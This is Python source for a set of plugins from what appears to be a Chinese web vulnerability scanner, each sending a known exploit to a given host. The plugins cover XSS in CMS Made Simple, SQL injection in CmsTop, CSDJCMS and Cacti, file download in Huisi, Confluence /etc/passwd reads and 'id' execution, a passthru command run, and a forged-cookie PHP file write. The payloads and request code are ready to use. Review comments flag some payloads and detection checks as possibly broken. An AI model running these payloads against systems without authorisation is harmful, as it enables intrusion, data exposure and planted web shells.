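    scheme, url, port = ClassCongregation.UrlProcessing().result(Url)
    # An explicit port wins; otherwise use the scheme default (https -> 443, http -> 80).
    if port is None:
        if scheme == 'https':
            port = 443
        elif scheme == 'http':
            port = 80
    try:
        RD = ClassCongregation.randoms().result(20)
        payload = "/cmsms2.2.7/admin/siteprefs.php"
        # .format(RD) is the fix: the marker must actually be part of what we send.
        data = '''__c=3da8342831010e889e2&active_tab=general&editsiteprefs=true&submit=Submit&sitename=lnyas's+cmsms&frontendlang=&frontendwysiwyg=-1&metadata=<script>alert("{}")</script>&logintheme=OneEleven&defaultdateformat=1&thumbnail_width=96&thumbnail_height=96&search_module=Search'''.format(RD)
        payload_url = scheme + "://" + url + ":" + str(port) + payload
        headers = {
            'User-Agent': RandomAgent,
            'Content-Type': 'application/x-www-form-urlencoded',
            'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
            "Accept-Language": "zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2",
            "Accept-Encoding": "gzip, deflate",
        }
        # TLS verification is intentionally off: scan targets often use self-signed certs.
        resp = requests.post(payload_url, data=data, headers=headers, proxies=proxies, timeout=6, verify=False)
        con = resp.text
        code = resp.status_code
        # Only the marker is checked, so an HTML-escaped reflection also matches.
        if code == 200 and con.find(RD) != -1:
            Medusa = "{}存在CMSMS存储型跨站脚本漏洞\r\n漏洞地址:\r\n{}\r\n漏洞详情:{}\r\n".format(url, payload_url, con)
            _t = VulnerabilityInfo(Medusa)
            ClassCongregation.VulnerabilityDetails(_t.info, url, **kwargs).Write()
            ClassCongregation.WriteFile().result(str(url), str(Medusa))
    except Exception as e:
        _ = VulnerabilityInfo('').info.get('algroup')
        ClassCongregation.ErrorHandling().Outlier(e, _)
        ClassCongregation.ErrorLog().Write("Plugin Name:" + _ + " || Target Url:" + url, e)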
def medusa(Url, RandomAgent, ProxyIp):
    """Probe CmsTop's vote controller for union-based SQL injection via ``contentid``.

    The injected query selects ``md5(c)`` from ``cmstop_admin``; the target is
    reported when ``4a8a08f09d37b73795649038408b5f33`` appears in the body.
    NOTE(review): ``c`` is unquoted, so MySQL treats it as a column name — the
    expected digest only appears if that resolves to the string "c" (or the
    quotes were lost when this payload was copied); confirm.  Spaces in the
    query string are left for requests to percent-encode.  The status code is
    not inspected.  A hit is rated High and written via WriteFile(); exceptions
    are logged via ErrorLog().Write().

    Args:
        Url: target such as "http://host:8080", split by UrlProcessing().result.
        RandomAgent: User-Agent header value.
        ProxyIp: accepted for interface compatibility; not used by this check.
    """
    scheme, host, port = ClassCongregation.UrlProcessing().result(Url)
    # An explicit port wins; otherwise use the scheme default (https -> 443, http -> 80).
    if port is None:
        if scheme == 'https':
            port = 443
        elif scheme == 'http':
            port = 80
    try:
        payload = "/?app=vote&controller=vote&action=total&contentid=1 and 1=2 union select md5(c) from cmstop_admin where departmentid=2 limit 0,1;#"
        digest = '4a8a08f09d37b73795649038408b5f33'
        target = f"{scheme}://{host}:{port}{payload}"
        headers = {
            'User-Agent': RandomAgent,
            'Content-Type': 'application/x-www-form-urlencoded',
            'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8'
        }
        session = requests.session()
        # TLS verification is intentionally off: scan targets often use self-signed certs.
        response = session.get(target, headers=headers, timeout=6, verify=False)
        body = response.text
        if digest in body:
            Medusa = "{}存在CmsTopSQL注入漏洞\r\n漏洞地址:\r\n{}\r\n漏洞详情:{}\r\n".format(host, target, body)
            finding = VulnerabilityInfo(Medusa)
            # Severity ladder used by this framework: serious > High > Intermediate > Low.
            ClassCongregation.VulnerabilityDetails(finding.info).High()
            ClassCongregation.WriteFile().result(str(host), str(Medusa))
    except Exception:
        plugin = VulnerabilityInfo('').info.get('algroup')
        ClassCongregation.ErrorLog().Write(host, plugin)
def medusa(Url, RandomAgent, UnixTimestamp):
    """Probe CSDJCMS /index.php/open/bang for error-based SQL injection in ``username``.

    Uses the classic ``count(*), concat(version(), floor(rand(0)*2)) ... group
    by x`` duplicate-key trick; a vulnerable target leaks a MySQL error
    containing ``for key 'group_key'``, which is the only thing checked (status
    code ignored).  Findings go to VulnerabilityDetails(..., UnixTimestamp)
    .Write() and WriteFile(); exceptions are logged via ErrorLog().Write().

    Args:
        Url: target such as "http://host:8080", split by UrlProcessing().result.
        RandomAgent: User-Agent header value.
        UnixTimestamp: passed through to VulnerabilityDetails.
    """
    scheme, host, port = ClassCongregation.UrlProcessing().result(Url)
    # An explicit port wins; otherwise use the scheme default (https -> 443, http -> 80).
    if port is None:
        if scheme == 'https':
            port = 443
        elif scheme == 'http':
            port = 80
    try:
        payload = "/index.php/open/bang"
        target = f"{scheme}://{host}:{port}{payload}"
        headers = {
            'User-Agent': RandomAgent,
            'Content-Type': 'application/x-www-form-urlencoded',
            'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8'
        }
        form = "openid=x&denglu=login&username=a%27 and(select 1 from (select count(*),concat(version(),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1#&userpass=testvul"
        error_fragment = "for key 'group_key'"
        session = requests.session()
        # TLS verification is intentionally off: scan targets often use self-signed certs.
        response = session.post(target, headers=headers, data=form, timeout=6, verify=False)
        body = response.text
        if error_fragment in body:
            Medusa = "{}存在CSDJCMSSQL注入漏洞\r\n漏洞地址:\r\n{}\r\n漏洞详情:{}\r\n".format(host, target, body)
            finding = VulnerabilityInfo(Medusa)
            ClassCongregation.VulnerabilityDetails(finding.info, host, UnixTimestamp).Write()
            ClassCongregation.WriteFile().result(str(host), str(Medusa))
    except Exception:
        plugin = VulnerabilityInfo('').info.get('algroup')
        ClassCongregation.ErrorLog().Write(host, plugin)
def medusa(Url, RandomAgent, ProxyIp):
    """Probe CSDJCMS (/index.php/dance/so/key/) for union-based SQL injection.

    Double-URL-encoded ``') and 1=2 union select 1,md5(3.1415),3,...,42#`` in
    ``key``; the target is reported when ``63e1f04640e83605c1d177544a5a0488``
    appears in the body.  Status code is not inspected.  A hit is rated High
    and written via WriteFile(); exceptions are logged via ErrorLog().Write().

    Args:
        Url: target such as "http://host:8080", split by UrlProcessing().result.
        RandomAgent: User-Agent header value.
        ProxyIp: accepted for interface compatibility; not used by this check.
    """
    scheme, host, port = ClassCongregation.UrlProcessing().result(Url)
    # An explicit port wins; otherwise use the scheme default (https -> 443, http -> 80).
    if port is None:
        if scheme == 'https':
            port = 443
        elif scheme == 'http':
            port = 80
    try:
        payload = "/index.php/dance/so/key/?key=%252527)%20%2561%256E%2564%201=2%20union%20%2573%2565%256C%2565%2563%2574%201,md5(3.1415),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42%23"
        digest = "63e1f04640e83605c1d177544a5a0488"
        target = f"{scheme}://{host}:{port}{payload}"
        headers = {
            'User-Agent': RandomAgent,
            'Content-Type': 'application/x-www-form-urlencoded',
            'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8'
        }
        session = requests.session()
        # TLS verification is intentionally off: scan targets often use self-signed certs.
        response = session.get(target, headers=headers, timeout=6, verify=False)
        body = response.text
        if digest in body:
            Medusa = "{}存在CSDJCMSSQL注入漏洞\r\n漏洞地址:\r\n{}\r\n漏洞详情:{}\r\n".format(host, target, body)
            finding = VulnerabilityInfo(Medusa)
            # Severity ladder used by this framework: serious > High > Intermediate > Low.
            ClassCongregation.VulnerabilityDetails(finding.info).High()
            ClassCongregation.WriteFile().result(str(host), str(Medusa))
    except Exception:
        plugin = VulnerabilityInfo('').info.get('algroup')
        ClassCongregation.ErrorLog().Write(host, plugin)
def medusa(Url, RandomAgent, ProxyIp):
    """Probe for the CMS Made Simple 2.2.7 reflected XSS in admin/moduleinterface.php.

    Severity-rating variant: the fixed marker ``cscanhyhm2n`` is injected via
    ``m1_version``; a 200 containing the marker is rated Low through
    VulnerabilityDetails and written via WriteFile().  The substring test also
    fires when the marker is reflected HTML-escaped.  Exceptions are logged via
    ErrorLog().Write().

    Args:
        Url: target such as "http://host:8080", split by UrlProcessing().result.
        RandomAgent: User-Agent header value.
        ProxyIp: accepted for interface compatibility; not used by this check.
    """
    scheme, host, port = ClassCongregation.UrlProcessing().result(Url)
    # An explicit port wins; otherwise use the scheme default (https -> 443, http -> 80).
    if port is None:
        if scheme == 'https':
            port = 443
        elif scheme == 'http':
            port = 80
    try:
        marker = 'cscanhyhm2n'
        # NOTE(review): PoC install path and __c key are hard-coded.
        payload = "/cmsms2.2.7/admin/moduleinterface.php?mact=ModuleManager,m1_,moduledepends,0&__c=3da8342831010e889e2&m1_name=Adherents&m1_version=0.2.6<script>alert(cscanhyhm2n)</script>&m1_filename=Adherents-0.2.6.xml"
        target = f"{scheme}://{host}:{port}{payload}"
        headers = {
            'User-Agent': RandomAgent,
            'Content-Type': 'application/x-www-form-urlencoded',
            'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8'
        }
        session = requests.session()
        # TLS verification is intentionally off: scan targets often use self-signed certs.
        response = session.get(target, headers=headers, timeout=6, verify=False)
        body = response.text
        if response.status_code == 200 and marker in body:
            Medusa = "{}存在CMSMS反射型跨站脚本漏洞\r\n漏洞地址:\r\n{}\r\n漏洞详情:{}\r\n".format(host, target, body)
            finding = VulnerabilityInfo(Medusa)
            # Severity ladder used by this framework: serious > High > Intermediate > Low.
            ClassCongregation.VulnerabilityDetails(finding.info).Low()
            ClassCongregation.WriteFile().result(str(host), str(Medusa))
    except Exception:
        plugin = VulnerabilityInfo('').info.get('algroup')
        ClassCongregation.ErrorLog().Write(host, plugin)
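def medusa(Url, RandomAgent, UnixTimestamp):
    """Probe a Huisi (汇思) deployment for arbitrary file download via cw/skin1/jsp/download.jsp.

    Fix: the URL was built as ``scheme + "//" + url`` (no colon), yielding
    ``http//host:80/...`` — never a valid request, so the plugin could only
    ever hit the error log.  It now uses ``"://"`` like the sibling plugins.

    Requests ``/WEB-INF/web.xml`` via ``file`` and reports a 200 whose body
    contains ``log4jConfigLocation`` (a context-param name commonly found in a
    Spring web.xml).  Findings go to VulnerabilityDetails(..., UnixTimestamp)
    .Write() and WriteFile(); exceptions are logged via ErrorLog().Write().

    Args:
        Url: target such as "http://host:8080", split by UrlProcessing().result.
        RandomAgent: User-Agent header value.
        UnixTimestamp: passed through to VulnerabilityDetails.
    """
    scheme, url, port = ClassCongregation.UrlProcessing().result(Url)
    # An explicit port wins; otherwise use the scheme default (https -> 443, http -> 80).
    if port is None:
        if scheme == 'https':
            port = 443
        elif scheme == 'http':
            port = 80
    try:
        payload = "/cw/skin1/jsp/download.jsp?file=/WEB-INF/web.xml"
        # "://" is the fix; the original "//" produced an unparseable URL.
        payload_url = scheme + "://" + url + ":" + str(port) + payload
        headers = {
            'User-Agent': RandomAgent,
            'Content-Type': 'application/x-www-form-urlencoded',
            'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8'
        }
        # TLS verification is intentionally off: scan targets often use self-signed certs.
        with requests.Session() as s:
            resp = s.get(payload_url, headers=headers, timeout=6, verify=False)
        con = resp.text
        code = resp.status_code
        if code == 200 and con.find('log4jConfigLocation') != -1:
            Medusa = "{}存在汇思软件任意文件下载漏洞\r\n验证数据:\r\nUrl:{}\r\nPayload:{}\r\n".format(url, payload_url, con)
            _t = VulnerabilityInfo(Medusa)
            ClassCongregation.VulnerabilityDetails(_t.info, url, UnixTimestamp).Write()
            ClassCongregation.WriteFile().result(str(url), str(Medusa))
    except Exception:
        _ = VulnerabilityInfo('').info.get('algroup')
        ClassCongregation.ErrorLog().Write(url, _)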
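def medusa(Url, RandomAgent, proxies=None, **kwargs):
    """Probe Confluence ``/rest/tinymce/1/macro/preview`` for template path traversal / command execution.

    Two widget-macro previews are sent: one with ``_template`` pointing at
    ``file:///etc/passwd`` (file read) and one with ``_template`` set to ``id``
    (command execution).  The target is reported if the first answers 200 with
    both "bin" and "root" in the body, or the second answers 200 with both
    "uid=" and "gid=".

    Fixes: the report string had three ``{}`` placeholders but was given four
    arguments, so it printed the *request body* where the response belonged
    and never said which probe fired; it now records the probe that matched
    and its actual response.  ``verify=False`` was also missing, unlike every
    sibling plugin, so HTTPS targets with self-signed certificates failed
    straight into the error log.

    NOTE(review): the payload asks the target to execute ``id``; this is
    active exploitation, not a version check.  ``Accept-Encoding`` advertises
    ``br``; if the server honours it and the brotli package is not installed,
    ``resp.text`` will not decode — confirm or drop ``br``.

    Args:
        Url: target such as "http://host:8080", split by UrlProcessing().result.
        RandomAgent: User-Agent header value.
        proxies: proxy specification, normalised by Proxies().result.
        **kwargs: forwarded unchanged to VulnerabilityDetails.
    """
    proxies = ClassCongregation.Proxies().result(proxies)
    scheme, url, port = ClassCongregation.UrlProcessing().result(Url)
    # An explicit port wins; otherwise use the scheme default (https -> 443, http -> 80).
    if port is None:
        if scheme == 'https':
            port = 443
        elif scheme == 'http':
            port = 80
    data = '''{"contentId":"1","macro":{"name":"widget","params":{"url":"https://www.viddler.com/v/test","width":"1000","height":"1000","_template":"file:///etc/passwd"},"body":""}}'''
    data2 = '''{"contentId":"1","macro":{"name":"widget","params":{"url":"https://www.viddler.com/v/test","width":"1000","height":"1000","_template":"id"},"body":""}}'''
    Payload = "/rest/tinymce/1/macro/preview"
    PayloadUrl = scheme + "://" + url + ':' + str(port) + Payload
    Referers = scheme + "://" + url + ':' + str(port)
    headers = {
        'Accept': 'text/plain, */*; q=0.01',
        'Accept-Language': 'zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3',
        'User-Agent': RandomAgent,
        'X-Requested-With': 'XMLHttpRequest',
        'Accept-Encoding': 'gzip, deflate, br',
        'Content-Type': 'application/json; charset=utf-8',
        'Referer': Referers,
        'Connection': 'keep-alive'
    }
    try:
        # TLS verification is intentionally off (added for parity with the other plugins).
        resp = requests.post(PayloadUrl, data=data, proxies=proxies, headers=headers, timeout=5, verify=False)
        resp2 = requests.post(PayloadUrl, data=data2, proxies=proxies, headers=headers, timeout=5, verify=False)
        con = resp.text
        con2 = resp2.text
        code = resp.status_code
        code2 = resp2.status_code
        low = con.lower()
        low2 = con2.lower()
        file_read_hit = code == 200 and low.find('bin') != -1 and low.find('root') != -1
        exec_hit = code2 == 200 and low2.find('uid=') != -1 and low2.find('gid=') != -1
        if file_read_hit or exec_hit:
            # Report the probe that actually matched, with its own response (the fix).
            sent, received = (data, con) if file_read_hit else (data2, con2)
            Medusa = "{}存在AtlassianConfluence路径穿越与命令执行漏洞 \r\n漏洞详情:\r\nPOST:{}\r\n返回内容:{}\r\n".format(url, sent, received)
            _t = VulnerabilityInfo(Medusa)
            ClassCongregation.VulnerabilityDetails(_t.info, url, **kwargs).Write()
            ClassCongregation.WriteFile().result(str(url), str(Medusa))
    except Exception as e:
        _ = VulnerabilityInfo('').info.get('algroup')
        ClassCongregation.ErrorHandling().Outlier(e, _)
        ClassCongregation.ErrorLog().Write("Plugin Name:" + _ + " || Target Url:" + url, e)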
def medusa(Url, RandomAgent, Token, proxies=None):
    """Probe admin/editusertag.php for authenticated command execution via a user tag.

    WARNING: the payload asks the target to run ``passthru('dir')`` — active
    code execution, gated by the hard-coded ``_sk_`` key and ``userplugin_id``
    from the original PoC (unlikely to match a live session).  A hit is a body
    containing ``{"response":"Success","details":"``; the status code is not
    inspected.  The hand-set ``Content-Length: 115`` is recomputed by requests
    from the real body.  Findings go to VulnerabilityDetails(..., Token)
    .Write() and WriteFile(); exceptions to ErrorHandling().Outlier() and
    ErrorLog().Write().

    Args:
        Url: target such as "http://host:8080", split by UrlProcessing().result.
        RandomAgent: User-Agent header value.
        Token: passed through to VulnerabilityDetails.
        proxies: proxy specification, normalised by Proxies().result.
    """
    proxies = ClassCongregation.Proxies().result(proxies)
    scheme, host, port = ClassCongregation.UrlProcessing().result(Url)
    # An explicit port wins; otherwise use the scheme default (https -> 443, http -> 80).
    if port is None:
        if scheme == 'https':
            port = 443
        elif scheme == 'http':
            port = 80
    try:
        payload = "/cms/cmsimple/admin/editusertag.php?_sk_=2a7da2216d41e0ac&userplugin_id=4"
        form = "_sk_=2a7da2216d41e0ac&userplugin_id=4&userplugin_name=aaa&code=passthru('dir')%3B&description=&run=1&apply=1&ajax=1"
        success_fragment = '''{"response":"Success","details":"}'''
        target = f"{scheme}://{host}:{port}{payload}"
        headers = {
            'User-Agent': RandomAgent,
            "Accept": "*/*",
            "Accept-Language": "en-US,en;q=0.5",
            "Accept-Encoding": "gzip, deflate",
            "Content-Type": "application/x-www-form-urlencoded; charset=UTF-8",
            "X-Requested-With": "XMLHttpRequest",
            "Content-Length": "115",
            "Connection": "close",
            "Pragma": "no-cache",
            "Cache-Control": "no-cache"
        }
        session = requests.session()
        # TLS verification is intentionally off: scan targets often use self-signed certs.
        response = session.post(target, data=form, headers=headers, proxies=proxies, timeout=6, verify=False)
        body = response.text
        if success_fragment in body:
            Medusa = "{}存在CMSMS任意命令执行漏洞\r\n漏洞地址:\r\n{}\r\n漏洞详情:{}\r\n".format(host, target, body)
            finding = VulnerabilityInfo(Medusa)
            ClassCongregation.VulnerabilityDetails(finding.info, host, Token).Write()
            ClassCongregation.WriteFile().result(str(host), str(Medusa))
    except Exception as e:
        plugin = VulnerabilityInfo('').info.get('algroup')
        ClassCongregation.ErrorHandling().Outlier(e, plugin)
        ClassCongregation.ErrorLog().Write(host, plugin)
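def medusa(Url, RandomAgent, UnixTimestamp):
    """CSDJCMS "getshell" check: write a template file via the skins editor using forged admin cookies.

    Fix: the original condition ``con.find('PHP Version') != -1 and
    con.find('System')`` never tested the second fragment — ``find`` returns
    -1 (truthy) when absent — so only "PHP Version" was really required.  Both
    fragments are now compared with ``!= -1``.

    WARNING: this is an active write.  The POST asks the target to save
    ``cs-bottom.php`` under ``../skins/index/html/``, using a forged admin
    cookie set (S_AdminID=1, S_Login=<md5>) taken from the PoC.  The request
    goes to the site root — NOTE(review): no admin path is appended; confirm.
    NOTE(review): the content decodes to ``<?php phpinfo ?>`` (no call
    parentheses), unlike the sibling plugin's ``phpinfo()``; if that is a
    typo the written file will not render the fingerprints this check needs.
    ``Content-Length`` is recomputed by requests, so the hand-set "169" is not
    what is sent.

    Args:
        Url: target such as "http://host:8080", split by UrlProcessing().result.
        RandomAgent: User-Agent header value.
        UnixTimestamp: passed through to VulnerabilityDetails.
    """
    scheme, url, port = ClassCongregation.UrlProcessing().result(Url)
    # An explicit port wins; otherwise use the scheme default (https -> 443, http -> 80).
    if port is None:
        if scheme == 'https':
            port = 443
        elif scheme == 'http':
            port = 80
    try:
        payload_url = scheme + "://" + url + ":" + str(port)
        referer = scheme + "://" + url
        headers = {
            "Host": "{}".format(url),
            "User-Agent": RandomAgent,
            "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8",
            "Accept-Language": "zh-cn,zh;q=0.8,en-us;q=0.5,en;q=0.3",
            "Accept-Encoding": "gzip, deflate",
            "Referer": "{}/admin/admin_t ... ;file=artindex.html".format(referer),
            "Cookie": "S_Permission=1,2,3,4,5,6,7,8,9,10,11,12,13,14,15; S_Login=d8d998f3eb371c2009acd8580c1821d0; S_AdminUserName=1; S_AdminPassWord=1; S_AdminID=1; CNZZDATA4170884=cnzz_eid%3D1098390420-1364934762-http%253A%252F%252Fwww.hshxs.com%26ntime%3D1364935608%26cnzz_a%3D19%26retime%3D1365111972892%26sin%3Dnone%26ltime%3D1365111972892%26rtime%3D0; bdshare_firstime=1365107576347; PHPSESSID=u6kd9d6f18fhfr9bi4if6agcj6",
            "Connection": "keep-alive",
            "Content-Type": "application/x-www-form-urlencoded",
            "Content-Length": "169"
        }
        # FileName=cs-bottom.php, content=<?php phpinfo ?>, folder=../skins/index/html/ (GBK-encoded labels follow)
        data = "FileName=cs-bottom.php&content=%3C%3Fphp+phpinfo+%3F%3E&folder=..%2Fskins%2Findex%2Fhtml%2F&tempname=%C4%AC%C8%CF%C4%A3%B0%E6&Submit=%D0%DE%B8%C4%B5%B1%C7%B0%C4%A3%B0%E5"
        # TLS verification is intentionally off: scan targets often use self-signed certs.
        with requests.Session() as s:
            resp = s.post(payload_url, data=data, headers=headers, timeout=6, verify=False)
        con = resp.text
        # Both phpinfo() fingerprints must be present (the fix: "!= -1" on the second).
        if con.find('PHP Version') != -1 and con.find('System') != -1:
            Medusa = "{}存在CSDJCMSGetshell\r\n漏洞地址:\r\n{}\r\n漏洞详情:{}\r\n".format(url, payload_url, con)
            _t = VulnerabilityInfo(Medusa)
            ClassCongregation.VulnerabilityDetails(_t.info, url, UnixTimestamp).Write()
            ClassCongregation.WriteFile().result(str(url), str(Medusa))
    except Exception:
        _ = VulnerabilityInfo('').info.get('algroup')
        ClassCongregation.ErrorLog().Write(url, _)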
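def medusa(Url, RandomAgent, ProxyIp):
    """CSDJCMS stored cross-site-scripting check (user profile edit).

    Sends a forged admin cookie set and a profile-edit POST whose ``CS_Qianm``
    field carries ``<isindex type=image src=1 onerror=alert(/'xss'/)>``, then
    reports the target when the response contains both ``PHP Version`` and
    ``System``.

    Args:
        Url: target as supplied by the caller; scheme, host and port are split
            by ``ClassCongregation.UrlProcessing``.
        RandomAgent: User-Agent string to send.
        ProxyIp: accepted for signature compatibility; this check does not
            use it (no proxy is passed to the request).

    Returns:
        None. A hit is rated High through ``VulnerabilityDetails`` and written
        with ``WriteFile``; any exception is written to ``ErrorLog``.

    Security notes:
        - If accepted, the request stores the XSS payload in the target's user
          profile — a persistent change that should be cleaned up after the
          test.
        - Authentication relies on hard-coded cookie values copied from a lab
          session (``CS_Login``, ``CS_AdminID=1`` …) — TODO confirm they are
          accepted by the target.
        - NOTE(review): the detection markers (``PHP Version``/``System``)
          look copied from the CSDJCMS getshell check; a stored-XSS check would
          normally look for the reflected ``CS_Qianm`` payload — confirm.
        - NOTE(review): the query string ``ac=edit@op=zl`` joins its two
          parameters with ``@`` rather than ``&`` — confirm against the
          original advisory before relying on this path.
        - TLS verification is disabled (``verify=False``).
    """
    scheme, url, port = ClassCongregation.UrlProcessing().result(Url)
    if port is None:
        if scheme == 'https':
            port = 443
        elif scheme == 'http':
            port = 80
    try:
        payload = "/user/do.php?ac=edit@op=zl"
        payload_url = scheme + "://" + url + ":" + str(port) + payload
        referer = scheme + "://" + url
        # Content-Length is not set by hand. The hard-coded "169" did not
        # match this body (162 bytes); requests recomputes the header from
        # the body anyway, so the literal was dead and misleading.
        headers = {
            "User-Agent": RandomAgent,
            "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8",
            "Accept-Language": "zh-cn,zh;q=0.8,en-us;q=0.5,en;q=0.3",
            "Accept-Encoding": "gzip, deflate",
            "Referer": "{}/admin/admin_t ... ;file=artindex.html".format(referer),
            "Cookie": "CS_AdminID=1; CS_AdminUserName=1; CS_AdminPassWord=1; CS_Quanx=0_1,1_1,1_2,1_3,1_4,1_5,2_1,2_2,2_3,2_4,2_5,2_6,2_7,3_1,3_2,3_3,3_4,4_1,4_2,4_3,4_4,4_5,4_6,4_7,5_1,5_2,5_3,5_4,5_5,6_1,6_2,6_3,7_1,7_2,8_1,8_2,8_3,8_4; CS_Login=a3f5f5a662e8a36525f4794856e2d0a2; PHPSESSID=48ogo025b66lkat9jtc8aecub1; CNZZDATA3755283=cnzz_eid%3D1523253931-1364956519-http%253A%252F%252Fwww.djkao.com%26ntime%3D1364956519%26cnzz_a%3D1%26retime%3D1365129491148%26sin%3D%26ltime%3D1365129491148%26rtime%3D0; bdshare_firstime=1365129335963",
            "Connection": "keep-alive",
            "Content-Type": "application/x-www-form-urlencoded",
        }
        data = "CS_Name=aaaaaa&CS_Email=a%40qq.com&CS_Nichen=aaaaaa&CS_Sex=0&CS_City=%C1%C9%C4%FE%CA%A1&CS_QQ=111111111&CS_Qianm=<isindex type=image src=1 onerror=alert(/'xss'/)>"
        with requests.session() as s:
            resp = s.post(payload_url, data=data, headers=headers,
                          timeout=6, verify=False)
        con = resp.text
        # Both markers must be present. The original tested the bare return
        # value of find('System'), which is -1 (truthy) when absent, so the
        # second marker was effectively ignored.
        if con.find('PHP Version') != -1 and con.find('System') != -1:
            Medusa = "{}存在CSDJCMS存储型跨站脚本漏洞\r\n漏洞地址:\r\n{}\r\n漏洞详情:{}\r\n".format(
                url, payload_url, con)
            _t = VulnerabilityInfo(Medusa)
            web = ClassCongregation.VulnerabilityDetails(_t.info)
            # Severity levels: serious, High, Intermediate, Low.
            web.High()
            # Persist to file; url is the per-target file name, Medusa the body.
            ClassCongregation.WriteFile().result(str(url), str(Medusa))
    except Exception:
        _ = VulnerabilityInfo('').info.get('algroup')
        # Log the failing URL together with the plugin name.
        _l = ClassCongregation.ErrorLog().Write(url, _)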
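def medusa(Url, RandomAgent, ProxyIp):
    """CmsTop remote code execution check (search module template injection).

    Two GETs are tried: ``/app/?app=search…`` on the given host, and the same
    query on the ``app.`` sub-domain of the host's parent domain. Both carry
    ``test=${@phpinfo()}``; a 200 response containing both ``PHP Version`` and
    ``Configure Command`` is reported.

    Args:
        Url: target as supplied by the caller; scheme, host and port are split
            by ``ClassCongregation.UrlProcessing``.
        RandomAgent: User-Agent string to send.
        ProxyIp: accepted for signature compatibility; this check does not
            use it (no proxy is passed to the request).

    Returns:
        The report strings of all hits concatenated, each followed by ``"\\n"``,
        when at least one payload hit; otherwise None.

    Security notes:
        - Active check: a hit means ``phpinfo()`` was executed on the target
          (information disclosure only, but still code execution).
        - TLS verification is disabled (``verify=False``).
    """
    scheme, url, port = ClassCongregation.UrlProcessing().result(Url)
    if port is None:
        if scheme == 'https':
            port = 443
        elif scheme == 'http':
            port = 80
    query = "?app=search&controller=index&id=$page&action=search&wd=a&test=${@phpinfo()}"
    payloads = [scheme + "://" + url + ":" + str(port) + "/app/" + query]
    # Second candidate: the ``app.`` sub-domain of the parent domain
    # (www.example.com -> app.example.com). The original concatenated
    # "app" directly onto the parent domain ("appexample.com"), which can
    # never resolve to the intended host. A single-label host has no parent
    # domain, so the candidate is skipped instead of sending "app:port".
    parent_domain = ".".join(url.split(".")[1:])
    if parent_domain:
        payloads.append(scheme + "://app." + parent_domain + ":" + str(port) + "/" + query)
    headers = {
        'User-Agent': RandomAgent,
        'Content-Type': 'application/x-www-form-urlencoded',
        'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8'
    }
    reports = []  # one report string per payload that hit
    for payload_url in payloads:
        try:
            with requests.session() as s:
                resp = s.get(payload_url, headers=headers, timeout=6, verify=False)
            con = resp.text
            code = resp.status_code
            if code == 200 and con.find('PHP Version') != -1 and con.find('Configure Command') != -1:
                Medusa = "{}存在CmsTop远程代码执行漏洞\r\n漏洞地址:\r\n{}\r\n漏洞详情:{}\r\n".format(
                    url, payload_url, con)
                _t = VulnerabilityInfo(Medusa)
                web = ClassCongregation.VulnerabilityDetails(_t.info)
                # Severity levels: serious, High, Intermediate, Low.
                web.High()
                # Persist to file; url is the per-target file name, Medusa the body.
                ClassCongregation.WriteFile().result(str(url), str(Medusa))
                # The original never appended to its result list, so the
                # function always returned None even on a hit.
                reports.append(Medusa)
        except Exception:
            _ = VulnerabilityInfo('').info.get('algroup')
            # Log the failing URL together with the plugin name.
            _l = ClassCongregation.ErrorLog().Write(url, _)
    if reports:
        return "".join(report + "\n" for report in reports)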
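def medusa(Url, RandomAgent, UnixTimestamp):
    """Cacti SQL injection check (``cdef.php?action=actions``, ``selected_items``).

    POSTs a PHP-serialised array whose single element is the SQL fragment
    ``',benchmark(10000000,md5(c)),'`` and reports the target when the response
    echoes ``4a8a08f09d37b73795649038408b5f33`` (md5 of ``c``).

    Args:
        Url: target as supplied by the caller; scheme, host and port are split
            by ``ClassCongregation.UrlProcessing``.
        RandomAgent: User-Agent string to send.
        UnixTimestamp: passed through to ``ClassCongregation.VulnerabilityDetails``.

    Returns:
        None. A hit is recorded through ``VulnerabilityDetails`` and
        ``WriteFile``; any exception is routed to ``ErrorHandling``/``ErrorLog``.

    Security notes:
        - ``benchmark(10000000, md5(...))`` makes the target's database server
          compute ten million MD5s per request; on a shared or small host this
          is a noticeable load, so do not run it in a loop.
        - TLS verification is disabled (``verify=False``).
    """
    scheme, url, port = ClassCongregation.UrlProcessing().result(Url)
    if port is None:
        if scheme == 'https':
            port = 443
        elif scheme == 'http':
            port = 80
    try:
        payload = "/cdef.php?action=actions"
        # The injected fragment must be wrapped as a PHP serialised string,
        # i.e. s:<byte length>:"<value>";. The original built the body from
        # three adjacent Python literals, which dropped the double quotes
        # around the value and left a fixed "s:31:" that did not match the
        # bytes actually sent (and a stray trailing space after
        # drp_action=1). Deriving the length from the fragment keeps the
        # serialisation self-consistent.
        fragment = "',benchmark(10000000,md5(c)),'"
        data = 'selected_items=a:1:{i:0;s:%d:"%s";}&drp_action=1' % (len(fragment), fragment)
        payload_url = scheme + "://" + url + ":" + str(port) + payload
        headers = {
            'User-Agent': RandomAgent,
            'Content-Type': 'application/x-www-form-urlencoded',
            'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8'
        }
        with requests.session() as s:
            resp = s.post(payload_url, headers=headers, data=data,
                          timeout=6, verify=False)
        con = resp.text
        # md5("c") — only present if the injected expression was evaluated
        # and its result echoed back.
        if con.find("4a8a08f09d37b73795649038408b5f33") != -1:
            Medusa = "{}存在CactiSQL注入漏洞\r\n漏洞地址:\r\n{}\r\n漏洞详情:{}\r\n".format(
                url, payload_url, con)
            _t = VulnerabilityInfo(Medusa)
            # Record the finding (url plus the scan data).
            ClassCongregation.VulnerabilityDetails(_t.info, url, UnixTimestamp).Write()
            # Persist to file; url is the per-target file name, Medusa the body.
            ClassCongregation.WriteFile().result(str(url), str(Medusa))
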